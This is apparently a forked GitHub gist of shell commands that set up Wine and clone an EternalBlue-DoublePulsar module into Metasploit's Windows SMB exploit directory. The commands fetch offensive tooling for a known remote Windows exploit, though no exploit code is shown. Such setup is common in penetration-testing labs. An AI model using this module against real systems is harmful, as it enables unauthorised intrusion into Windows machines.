Skip to content

Instantly share code, notes, and snippets.

View SrikeshMaharaj's full-sized avatar

Srikesh Maharaj SrikeshMaharaj

View GitHub Profile
@SrikeshMaharaj
SrikeshMaharaj / eb_msf
Created February 27, 2023 09:03 — forked from hva314/eb_msf
EternalBlue-DoublePulsar Metasploit Module
## setting up wine32
dpkg --add-architecture i386
apt-get update
apt-get install wine32
mkdir -p /root/.wine/drive_c/
## get doublepulsar module for metasploit
mkdir -p /root/.msf4/modules/exploits/windows/smb/
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git /root/.msf4/modules/exploits/windows/smb/